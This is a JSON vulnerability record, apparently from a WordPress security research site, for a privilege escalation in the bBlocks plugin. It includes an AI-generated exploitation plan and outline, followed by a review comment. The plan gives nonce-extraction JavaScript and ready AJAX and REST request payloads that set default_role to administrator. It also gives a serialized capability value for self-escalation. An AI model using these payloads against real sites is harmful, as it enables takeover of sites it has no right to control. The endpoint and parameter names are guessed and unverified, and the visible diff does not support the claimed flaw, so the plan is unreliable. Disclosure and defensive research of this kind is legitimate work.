[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fBZgh5kUWkA4BnAdf6nXxrM-HwUiDazac4iB1pg6tNGE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-39579","bblocks-essential-gutenberg-blocks-patterns-collection-authenticated-contributor-privilege-escalation","bBlocks – Essential Gutenberg Blocks & Patterns Collection \u003C= 2.0.31 - Authenticated (Contributor+) Privilege Escalation","The bBlocks – Essential Gutenberg Blocks & Patterns Collection plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.0.31.  
This makes it possible for authenticated attackers, with Contributor-level access and above, to elevate their privileges to that of an administrator.","b-blocks",null,"\u003C=2.0.31","2.0.32","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-04-16 00:00:00","2026-04-21 15:26:37",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F89218de3-7bb9-42f5-86d8-48d28c380231?source=api-prod",6,[22,23,24,25,26,27,28,29],"build\u002Fadmin-dashboard.asset.php","build\u002Fadmin-dashboard.js","build\u002Fcarousel\u002Fview.asset.php","build\u002Fcarousel\u002Fview.js","build\u002Fcountdown\u002Fview.asset.php","build\u002Fcountdown\u002Fview.js","build\u002Fform-builder\u002Fview.asset.php","build\u002Fform-builder\u002Fview.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-39579 (bBlocks Privilege Escalation)\n\n## 1. Vulnerability Summary\nThe **bBlocks – Essential Gutenberg Blocks & Patterns Collection** plugin (\u003C= 2.0.31) contains an authenticated privilege escalation vulnerability. The flaw exists because settings-saving functionality (likely via AJAX or REST API) uses an incorrect capability check (e.g., `edit_posts` instead of `manage_options`). This allows users with **Contributor** roles or higher to modify arbitrary WordPress options. By updating the `default_role` to `administrator` and enabling `users_can_register`, an attacker can create a new admin account or potentially modify their own user meta to gain full administrative access.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (most likely) or the WordPress REST API (`\u002Fwp-json\u002F`).\n- **Action\u002FRoute:** Likely `b_blocks_save_settings` or a REST endpoint like `\u002Fwp-json\u002Fb-blocks\u002Fv1\u002Fsettings`.\n- **Payload Parameters:**\n    - `action`: The AJAX action string (e.g., `b_blocks_save_settings`).\n    - `_wpnonce` \u002F `nonce`: Security token.\n    - `settings`: An array or JSON object containing option keys and values.\n- **Vulnerable Parameters:** Any parameter that maps directly to `update_option()`.\n- **Authentication:** Authenticated as **Contributor** (requires `wp-login.php` session).\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an AJAX handler or REST route for the admin dashboard (referenced in `build\u002Fadmin-dashboard.js`).\n2.  **Capability Check:** The handler performs a check using `current_user_can( 'edit_posts' )`. Since Contributors can edit posts, they pass this check.\n3.  **Input Processing:** The handler takes a list of settings from `$_POST` or the REST body.\n4.  **Sink:** The handler iterates through the input and calls `update_option( $key, $value )` without a whitelist, or with a whitelist that includes sensitive WordPress core options.\n\n## 4. Nonce Acquisition Strategy\nThe admin dashboard logic is contained in `build\u002Fadmin-dashboard.js`. The nonce is likely localized using `wp_localize_script` in a PHP file (e.g., `includes\u002Fadmin\u002Fclass-admin.php` or the main plugin file).\n\n1.  **Identify Shortcode\u002FPage:** Check the main plugin PHP for `add_menu_page` or `add_shortcode`. Gutenberg plugins often enqueue settings nonces on the block editor screen or a custom dashboard page.\n2.  **Contributor Access:** Navigate to a page accessible by a Contributor (e.g., `\u002Fwp-admin\u002Fpost-new.php` or the plugin's dashboard if allowed).\n3.  
**Extraction:**\n    - The JS localization key is likely `bBlocksAdminData` or `bBlocksSettings`.\n    - Use `browser_eval` to extract the nonce:\n      ```javascript\n      \u002F\u002F Example targets to check\n      window.bBlocksAdminData?.nonce\n      window.bBlocksSettings?.nonce\n      window.bBlocksData?.nonce\n      ```\n4.  **Action Check:** Verify if the nonce action in `wp_create_nonce` matches the action in `check_ajax_referer` or `wp_verify_nonce`.\n\n## 5. Exploitation Strategy\n### Step 1: Discover the Endpoint\nGrep the plugin directory for the following:\n- `grep -r \"wp_ajax_b_blocks\" .`\n- `grep -r \"register_rest_route\" .`\n- `grep -r \"update_option\" .`\n\n### Step 2: Prepare Payload\nThe goal is to modify core WordPress settings.\n**Target Options:**\n- `default_role` -> `administrator`\n- `users_can_register` -> `1`\n\n**Sample AJAX Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=b_blocks_save_settings&nonce=[EXTRACTED_NONCE]&settings[default_role]=administrator&settings[users_can_register]=1\n```\n\n### Step 3: Execute Registration\nOnce the options are changed, navigate to `\u002Fwp-login.php?action=register` to create a new account, which will now default to the Administrator role.\n\n## 6. Test Data Setup\n1.  Install WordPress with the `b-blocks` plugin (version \u003C= 2.0.31).\n2.  Create a user with the **Contributor** role.\n3.  Verify current settings: `wp option get default_role` (should be `subscriber`) and `wp option get users_can_register` (should be `0`).\n\n## 7. Expected Results\n- The server returns a `200 OK` or `{\"success\":true}`.\n- The `default_role` option in the database is updated to `administrator`.\n- The `users_can_register` option is updated to `1`.\n\n## 8. Verification Steps\n1.  **Check Options via CLI:**\n    ```bash\n    wp option get default_role\n    wp option get users_can_register\n    ```\n2.  
**Check User Escalation (Alternative):** If the payload allowed targeting `wp_capabilities` for a specific user ID, check the role of the contributor:\n    ```bash\n    wp user get [CONTRIBUTOR_ID] --field=roles\n    ```\n\n## 9. Alternative Approaches\n- **Direct Meta Update:** If the vulnerable function uses `update_user_meta` instead of `update_option`, target the Contributor's user ID to change their `wp_capabilities` to `a:1:{s:13:\"administrator\";b:1;}`.\n- **REST API Route:** If the plugin uses REST, the request would be:\n    ```http\n    POST \u002Fwp-json\u002Fb-blocks\u002Fv1\u002Fsettings HTTP\u002F1.1\n    Content-Type: application\u002Fjson\n    X-WP-Nonce: [EXTRACTED_NONCE]\n\n    {\n      \"default_role\": \"administrator\",\n      \"users_can_register\": 1\n    }\n    ```\n    *(Check `register_rest_route` calls to confirm the exact path and parameter structure.)*","The bBlocks plugin (\u003C= 2.0.31) incorrectly uses the 'edit_posts' capability for its settings-saving functionality rather than the 'manage_options' capability. 
This allows authenticated users with Contributor-level permissions or higher to modify arbitrary WordPress options, including sensitive core settings.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.31\u002Fbuild\u002Fadmin-dashboard.asset.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.32\u002Fbuild\u002Fadmin-dashboard.asset.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.31\u002Fbuild\u002Fadmin-dashboard.asset.php\t2026-03-03 09:27:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.32\u002Fbuild\u002Fadmin-dashboard.asset.php\t2026-03-03 09:27:24.000000000 +0000\n@@ -1 +1 @@\n-\u003C?php return array('dependencies' => array('react', 'react-dom', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-i18n'), 'version' => '98328efe16bcd91feec8');\n+\u003C?php return array('dependencies' => array('react', 'react-dom', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-i18n'), 'version' => 'ef0b16b7bbdff4475bfc');\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.31\u002Fbuild\u002Fadmin-dashboard.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.32\u002Fbuild\u002Fadmin-dashboard.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.31\u002Fbuild\u002Fadmin-dashboard.js\t2026-03-03 09:27:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.32\u002Fbuild\u002Fadmin-dashboard.js\t2026-03-03 09:27:24.000000000 +0000\n... (truncated)","1. Authentication: Log in as a user with at least Contributor-level privileges.\n2. 
Nonce Acquisition: Access the plugin dashboard or a post editing page to extract the security nonce from the localized JavaScript data (e.g., window.bBlocksAdminData.nonce).\n3. Payload Preparation: Construct a POST request targeting the settings-saving endpoint (either wp-admin\u002Fadmin-ajax.php with the action 'b_blocks_save_settings' or the plugin's REST API endpoint).\n4. Privilege Escalation: Include parameters in the request to update sensitive WordPress options, such as setting 'default_role' to 'administrator' and 'users_can_register' to '1'.\n5. Execution: Submit the request. Because the server improperly validates the user's capability as 'edit_posts', the request is authorized.\n6. Verification: Navigate to the registration page to create a new administrator account or observe the elevation of the default role.","gemini-3-flash-preview","2026-04-27 14:20:20","2026-04-27 14:21:01",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","2.0.31","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fb-blocks\u002Ftags\u002F2.0.31","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fb-blocks.2.0.31.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fb-blocks\u002Ftags\u002F2.0.32","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fb-blocks.2.0.32.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fb-blocks\u002Ftags"]
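Review bot: the only hunk visible in `research_fix_diff`, for `build/admin-dashboard.asset.php`, changes nothing but the `'version'` build hash (`98328efe16bcd91feec8` to `ef0b16b7bbdff4475bfc`) and leaves the dependency array identical, so it shows no authorization change. The `build/admin-dashboard.js` diff is truncated before its first hunk, and `patch_diff_files` lists only `build/` JavaScript and asset files. The `edit_posts` versus `manage_options` capability check named in the summary is therefore not confirmed by these lines, which is consistent with `research_verified` being false and the code flow being marked as inferred. Suggest adding the diff of the server-side handler that performs the capability check and the option write, and treating the endpoint name, nonce key and parameter names in the plan as unverified until that diff is present.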